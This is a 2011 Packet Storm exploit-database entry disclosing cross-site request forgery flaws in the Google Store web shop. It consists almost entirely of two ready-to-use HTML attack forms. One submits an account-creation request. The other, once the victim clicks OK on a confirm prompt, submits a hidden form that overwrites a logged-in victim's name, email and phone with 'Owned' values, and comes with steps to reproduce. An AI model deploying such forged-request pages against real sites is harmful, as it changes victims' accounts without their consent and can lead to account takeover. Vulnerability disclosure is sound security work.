Google Store Cross Site Request Forgery

2011-08-27T00:00:00
ID PACKETSTORM:104519
Type packetstorm
Reporter C4SS!0 G0M3S
Modified 2011-08-27T00:00:00

Description

                                        
                                            `#  
#[+]Exploiy Title: Google Store Multiple XSRF Security Vulnerabilities  
#[+]Date: 26\08\2011  
#[+]Author: C4SS!0 G0M3S  
#[+]Vendor Link: https://www.google-store.com  
#  
  
#################################### Add User ####################################################  
<body style="background-color: black; color: white;">  
<form action="https://www.google-store.com/create_account.php" method="POST">  
<input type="hidden" name="action" value="process"></input>  
<b>First Name:</b><br><input type="text" size="50" name="firstname" value=""></input><br>  
<b>Last Name:</b><br><input type="text" size="50" name="lastname" value=""></input><br>  
<b>E-mail Address:</b><br><input type="text" size="50" name="email_address" value=""></input><br>  
<b>Company:</b><br><input type="text" size="50" name="company" value=""></input><br>  
<b>Address:</b><br><input type="text" size="50" name="street_address" value=""></input><br>  
<b>Post Code:</b><br><input type="text" size="50" name="postcode" value=""></input><br>  
<input type="hidden" name="country" value="30"></input>  
<b>City:</b><br><input type="text" size="50" name="city" value=""></input><br>  
<b>Telephone:</b><br><input type="text" size="50" name="telephone" value=""></input><br>  
<b>Fax:</b><br><input type="text" size="50" name="fax" value=""></input><br>  
<input type="hidden" name="newsletter" value="1"></input>  
<input type="hidden" name="x" value="47"></input>  
<input type="hidden" name="y" value="15"></input>  
  
<input type="submit" value="Send Request"></input>  
</form>  
#################################################################################################  
  
################################### Profile User Informations Editor ############################  
<title>Google Store Profile Informations Editor CSRF Vulnerability.</title>  
<body onload="con = confirm('Are You Ready'); if(con){document.send.submit()}" style="background-color:black; color: white;">  
<h1>This exploit demonstrates how to exploit a CSRF flaw on the site of the Google Store.<br><br>  
Steps to reproduce:<br><br>  
1. Log in no <a href="https://www.google-store.com" target="_blank">Google Store</a>.<br>  
2. Open this exploit and click in Ok.<br>  
3. Check your profile configurations. :)<br><br>  
Are You Ready?  
</h1>  
<form name="send" action="https://www.google-store.com/account_edit.php" method="POST">   
<input type="hidden" name="action" value="process"></input>  
<input type="hidden" name="firstname" value="Owned"></input>  
<input type="hidden" name="lastname" value="Owned"></input>  
<input type="hidden" name="email_address" value="Owned@gmail.com"></input>  
<input type="hidden" name="telephone" value="123456789"></input>  
<input type="hidden" name="fax" value="9876543210"></input>  
<input type="hidden" name="x" value="99"></input>  
<input type="hidden" name="y" value="99"></input>  
</form>  
#####################################################################################################  
`